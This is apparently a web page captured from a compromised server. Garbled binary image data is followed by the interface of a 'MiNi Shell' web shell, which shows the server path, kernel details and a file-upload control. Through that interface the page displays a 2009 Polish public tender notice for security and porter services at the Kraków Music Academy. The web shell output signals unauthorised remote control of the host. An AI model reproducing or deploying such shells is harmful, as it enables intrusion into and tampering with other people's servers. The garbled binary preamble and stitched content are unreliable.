JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090511/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090511/141644-N-2009.html

<p class="kh_header"><b>Kraków: Całodobowa ochrona osób i mienia oraz pełnienie usługi portierskiej</b><br>
<b>Numer ogłoszenia: 141644 - 2009; data zamieszczenia: 11.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Muzyczna w Krakowie , ul. Św. Tomasza 43, 31-027 Kraków, woj. małopolskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.amuz.krakow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.amuz.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Całodobowa ochrona osób i mienia oraz pełnienie usługi portierskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Całodobowa ochrona osób i mienia oraz pełnienie usługi portierskiej w budynku 
      Akademii Muzycznej  przy ul. św. Tomasza 43 w Krakowie..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 98.34.11.20-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 3900 PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą brać udział wykonawcy, którzy spełniają warunki określone 
         w art. 22 ust.1 ustawy prawo zamówień publicznych tj. :
-  posiadają uprawnienia do wykonywania  działalności w zakresie ochrony osób 
            i mienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
         -  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem 
            technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią 
            pisemne zobowiązanie innych podmiotów do udostępnienia potencjału 
            technicznego lub osób zdolnych do wykonania zamówienia,
         -  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
            zamówienia,
         -  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia 
            publicznego.
Dodatkowe wymagania :
- ze względu na specyfikę zamówienia  wymagane  jest realizowanie zamówienia
  siłami  własnymi wykonawcy (bez podwykonawców),
- wszystkie osoby przewidziane do wykonywania tego zamówienia muszą posiadać 
  licencję I lub II stopnia w zakresie ochrony mienia i osób.
  W trakcie realizacji zamówienia zamiana tych osób będzie możliwa po uprzednim 
  zaakceptowaniu przez Zamawiającego a osoby te muszą posiadać kwalifikacje jw.
- pracownicy ochrony skierowani do pracy na terenie Akademii Muzycznej w Krakowie nie 
  mogą posiadać orzeczenia o niepełnosprawności. Oczekujemy, że wykonawca skieruje 
  do pracy osoby w pełni sprawne zarówno fizycznie jak i psychicznie, o wysokiej kulturze 
  osobistej. Od pracowników oczekujemy ponadto asertywności i łatwości w nawiązywaniu 
   kontaktów interpersonalnych. Zastosowanie wyżej wymienionych kryteriów, wynika ze 
   specyfiki obiektu, jego prestiżowego charakteru, oraz obowiązków pracowników 
   ochrony, do których należy między innymi bezpośredni kontakt z pracownikami i 
   studentami Akademii, gośćmi, uczestnikami spotkań, koncertów i konferencji. 
   Pracownicy ochrony, stanowią pierwszą formę kontaktu dla osób wchodzących do 
   obiektu, są więc swoistą wizytówką Uczelni. A Akademia Muzyczna w Krakowie, jako 
   instytucja publiczna, o dużym znaczeniu kulturalnym ma obowiązek zapewnić swoim 
   użytkownikom najwyższy poziom usługi w każdym zakresie swojej działalności, na 
   każdym etapie obsługi użytkownika.
  Osoby te w trakcie pełnienia swoich obowiązków  winny charakteryzować  się 
  nienagannym i schludnym wyglądem zewnętrznym (ubiór jednolity dla wszystkich - 
  koszula, spodnie, marynarka, krawat), identyfikator ze zdjęciem. 
- wymagane jest wykonywanie zamówienia przez stały zespół pracowników, w liczbie 
  zapewniającej ich sprawne i dokładne realizowanie, 
- wykonawca będzie zobowiązany do wzięcia odpowiedzialności za instrumenty   
  muzyczne, sprzęt i wyposażenie znajdujące się w pomieszczeniach, za stan 
  powierzonych mu pomieszczeń oraz za szkody powstałe z jego winy w trakcie 
  wykonywania zamówienia,
- Wykonawca przez cały okres realizacji zamówienia musi posiadać aktualne  
  ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
  gospodarczej na kwotę nie mniejszą niż 100.000,00 zł (sto tysięcy złotych),
-  w obiekcie znajduje się jedna portiernia, przy wejściu głównym do budynku,
- pozostałe warunki realizacji zamówienia określa wzór umowy stanowiący załącznik 
  nr 2 do nin. Specyfikacji.

Uwaga :
- średnia dzienna liczba użytkowników budynku wynosi ok.  1000 osób,
- zajęcia dydaktyczne odbywają się od poniedziałku do soboty włącznie,
- ze względu na specyfikę  obiektu wskazane jest aby każdy wykonawca, przed 
  sporządzeniem oferty, dokonał wizji lokalnej w budynku (w porozumieniu z 
  Działem Administracyjno-Gospodarczym  Zamawiającego).

Opis sposobu dokonywania oceny spełnienia tych warunków.
1. Przedmiot zamówienia mieści się w zakresie działalności wykonawcy i jest 
    uwidoczniony w dokumentach rejestrowych wykonawcy, a jeśli specyfika 
    wykonania przedmiotu zamówienia wymaga posiadania koncesji, zezwolenia, 
    licencji, wykonawca udokumentuje ich posiadanie.
        2. Wykonawca udokumentuje :  
            - że prowadzi działalność polegającą na świadczeniu usług odpowiadających 
              swoim rodzajem usługom objętym niniejszym zamówieniem od co najmniej 
              2 lat,
            - wykonanie w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego 
             postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym 
             okresie, lub aktualne wykonywanie - co najmniej dwóch usług odpowiadających
             swoim rodzajem i wartością przedmiotowi niniejszego zamówienia, przestawiając 
             dokumenty potwierdzające, należyte ich wykonanie/ wykonywanie.
             Przez usługę odpowiadającą przedmiotowi nin. zamówienia należy rozumieć
             usługę polegającą na ochronie osób i mienia oraz pełnieniu usługi 
             portierskiej w obiektach użyteczności publicznej lub w obiektach, 
             świadczoną przez 7 dni w tygodniu, dla jednego podmiotu przez okres
             co najmniej 12 kolejnych miesięcy, wymagany minimalny czasokres
             świadczenia usługi (12 m-cy musi zawierać się w ustawowym okresie
             trzech lat przed dniem wszczęci niniejszego postępowania.
          -  że dysponuje i przeznaczy do realizacji niniejszego zamówienia odpowiednią 
             ilość osób, dla zapewnienia należytego wykonania zamówienia.
             Wszystkie osoby przewidziane do wykonywania tego zamówienia muszą posiadać 
             licencję I lub II stopnia w zakresie  ochrony  mienia i osób.
       3. Wykonawca złoży do oferty oświadczenie, że nie podlega wykluczeniu 
           z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ust.1 
           i 2 cyt. Ustawy (wzór formularza w tym zakresie stanowi załącznik nr 3 do nin. 
           Specyfikacji).

      4.  Wymagania dodatkowe :
            -  wykonawca poniesie wszelkie koszty związane z przygotowaniem i złożeniem 
               oferty,
            - wykonawca wyrazi zgodę na realizację zamówienia zgodnie z warunkami nin. 
               Specyfikacji,
            - ewentualne zastrzeżenia i zapytania do nin. Specyfikacji wykonawca złoży w 
              siedzibie Zamawiającego nie później niż do sześciu dni przed terminem otwarcia 
              ofert,
      -  w przypadku wybrania jego oferty zawrze umowę w brzmieniu jak we wzorze
 załączonym do nin. Specyfikacji (zał. nr 2). 
Ocena spełnienia powyższych warunków dokonana będzie na podstawie 
     przedłożonych przez Wykonawcę dokumentów i oświadczeń, według formuły: spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dokumenty i oświadczenia, jakie mają dostarczyć wykonawcy w celu 
      potwierdzenia spełnienia warunków udziału w postępowaniu. 
                                                       
1.	W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy Prawo zamówień publicznych do oferty należy załączyć :
a)  aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do 
                ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu 
               do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony 
               nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
               W przypadku składania oferty przez spółki cywilne dodatkowo obowiązuje
               załączenie umowy spółki.
           b) koncesję wydaną przez MSWiA na prowadzenie działalności w zakresie ochrony 
               osób i mienia, 
           c) aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz 
               właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego  
               Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie 
               zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie społeczne
               lub zdrowotne lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie,
               odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości
               wykonania decyzji właściwego organu. Zaświadczenia te winny być
               wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania 
               ofert.                 
           d) aktualną informację z Krajowego Rejestru Karnego albo równoważne 
               zaświadczenia właściwego organu sądowego lub administracyjnego kraju 
               pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, 
              wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
                e) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w 
                    art. 24 ust.1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed 
                    upływem wyznaczonego terminu składania ofert.
                                
      2. W celu potwierdzenia, że wykonawca posiada niezbędną wiedzę i doświadczenie 
          oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania 
          zamówienia, do oferty należy dołączyć :
          a) informację o doświadczeniu zawodowym wykonawcy w wykonywaniu tego 
               rodzaju zamówień w obiektach użyteczności publicznej - należy przedstawić .
               szczegółową informację, zgodnie z opisem przedstawionym w punkcie Vb.2 nin. 
               Specyfikacji, o zamówieniach wykonanych lub wykonywanych w okresie 
               ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym 
               okresie, jednak nie mniej niż 2 takie zamówienia, w obiektach użyteczności
               publicznej. Informacja ta winna być podana w układzie tabelarycznym (według 
               wzoru stanowiącego załącznik nr 4 do nin. Specyfikacji) i poparta dokumentami 
               (np. referencje poprzednio zamawiających), potwierdzającymi, że usługi te 
               zostały wykonane należycie. 
               W referencjach (datowanych) winna być zawarta informacja o szczegółowym 
               zakresie wykonanych prac, terminach realizacji, wartości zamówienia oraz 
               ocena jakości zrealizowanego zamówienia.
         b)  szczegółową informację o pełnym zespole wykonawczym przewidzianym do 
              wykonania nin. zamówienia - w układzie tabelarycznym (według wzoru - zał. 
              nr 5 do nin. Specyfikacji -Potencjał kadrowy),
c)	pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do 
     wykonywania zamówienia, jeżeli w wykazie w którym mowa powyżej (pkt b) 
     wykonawca wskaże osoby, którymi będzie dysponował.

      3.   W celu potwierdzenia, że wykonawca znajduje się w sytuacji ekonomicznej i 
            finansowej zapewniającej wykonanie zamówienia do oferty należy dołączyć : 
            a) informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w 
               których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych 
               środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie 
               wcześniej niż 3 miesiące przed upływem terminu składania ofert,
           b) polisę, a w przypadku jej braku  inny dokument, potwierdzający, że wykonawca
               jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
               działalności gospodarczej (na kwotę nie mniejszą niż 100.000,00 zł (sto tysięcy 
               złotych).

      4.  Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium 
            Rzeczpospolitej Polskiej zamiast dokumentów, o których mowa w pkt. VI - 
            Wykonawca składa odpowiednio dokumenty i oświadczenia zgodnie z § 2 
            ust.1, 2 i 3 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. w                                                   
            sprawie rodzaju dokumentów, jakich może żądać zamawiający od wykonawcy 
            oraz form, w jakich te dokumenty mogą być składane (Dz. U. nr 87, poz. 605, 
            ze zm.).

      5.  Każdy z wykonawców wspólnie ubiegających się o zamówienie musi dołączyć 
           do oferty oświadczenie, o którym mowa w punkcie Vb ust. 3 oraz dokumenty 
           wystawione dla każdego z nich, a wymienione w punkcie VI ust. 1 nin. SIWZ, 
           które potwierdzą spełnianie warunków udziału w postępowaniu każdego 
           wykonawcy. Pozostałe oświadczenia i dokumenty muszą potwierdzać, że 
           wykonawcy wspólnie spełniają pozostałe warunki udziału w postępowaniu.   
                                                     
6.	Zamawiający wezwie wykonawców, którzy nie złożyli do oferty oświadczeń lub dokumentów potwierdzających spełnianie warunków udziału w postępowaniu lub nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnienie przez Wykonawcę warunków udziału w postępowaniu nie później niż w dniu, w którym upływa termin składania ofert. Zamawiający wezwie także, w wyznaczonym przez siebie terminie, wykonawców do złożenia wyjaśnień dotyczących oświadczeń i dokumentów, o których mowa wyżej..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.amuz.krakow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Akademia Muzyczna w Krakowie, ul.Św.Tomasza 43, 31-027 Kraków,pok.308.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.05.2009 godzina 13:00, miejsce: Akademia Muzyczna w Krakowie, ul.Św.Tomasza 43, 31-027 Kraków,pok.308.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com